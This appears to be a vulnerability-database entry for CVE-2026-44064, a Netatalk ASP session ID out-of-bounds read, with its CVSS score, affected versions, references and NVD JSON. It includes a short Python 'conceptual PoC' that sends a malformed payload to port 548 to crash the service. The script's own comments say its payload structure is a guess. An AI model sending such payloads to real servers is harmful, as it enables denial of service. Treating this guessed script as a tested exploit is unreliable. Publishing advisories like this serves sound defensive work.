CVE-2026-44064

Description

An out-of-bounds read in ASP session ID handling in Netatalk 1.3 through 4.4.2 allows an adjacent network attacker to obtain limited information or cause a denial of service via a crafted ASP request.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Netatalk 1.3

Netatalk 1.4

Netatalk 1.5

Netatalk 1.6

Netatalk 2.x

Netatalk 3.x

Netatalk 4.0

Netatalk 4.1

Netatalk 4.2

Netatalk 4.3

Netatalk 4.4.0

Netatalk 4.4.1

Netatalk 4.4.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Conceptual PoC for CVE-2026-44064
# Target: Netatalk 1.3 - 4.4.2
def trigger_poc(target_ip, target_port):
    # Crafted payload with malformed Session ID to trigger OOB read
    # Adjust payload structure based on specific protocol analysis
    header = b"\x00\x04"  # Example ASP command header
    # Malformed session ID buffer causing OOB read
    malformed_session_id = b"\xFF" * 256  
    payload = header + malformed_session_id

    try:
        print(f"[*] Sending payload to {target_ip}:{target_port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((target_ip, target_port))
        s.send(payload)
        print("[*] Payload sent. Check if service crashed.")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        s.close()

if __name__ == "__main__":
    trigger_poc("192.168.1.100", 548)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44064
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44064
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44064/
[4] VulDB https://vuldb.com/cve/CVE-2026-44064
[5] https://netatalk.io/security/CVE-2026-44064

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44064", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:22.020", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An out-of-bounds read in ASP session ID handling in Netatalk 1.3 through 4.4.2 allows an adjacent network attacker to obtain limited information or cause a denial of service via a crafted ASP request."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44064", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}